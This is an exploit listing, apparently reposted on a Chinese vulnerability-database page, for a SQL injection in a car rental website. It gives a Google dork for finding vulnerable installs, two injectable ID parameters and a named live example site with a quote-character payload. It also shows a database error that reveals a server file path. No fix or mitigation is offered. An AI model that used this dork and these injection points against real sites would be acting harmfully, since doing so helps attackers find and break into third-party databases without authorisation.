CopyRight © 2015 Hainan Pingan Car Rental Network China SQL Injection Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1034850 漏洞类型
发布时间 2018-06-02 更新时间 2018-06-02
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018060026
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#################################################################################################

# Exploit Title : CopyRight © 2015 Hainan Pingan Car Rental Network China SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 01/06/2018
# Tested On : Windows
# Exploit Risk : Medium
# CWE: CWE-89

#################################################################################################

# Google Dork : intext:''CopyRight © 2015 海南平安租车网 版权所有''

# Exploit : /productsview.php?ID=[SQL Injection]

# Exploit : /aboutus.php?ID=[SQL Injection]

#################################################################################################

# Example Site =>  66664020.com/m/aboutus.php?ID=1%27 [ Proof of Concept for SQL Inj ] => archive.is/d8jpO

# SQL/DB Error : 

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/wcj66664020nwickj66p6g6a6a4d0k230/wwwroot/m/aboutus.php on line 15

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################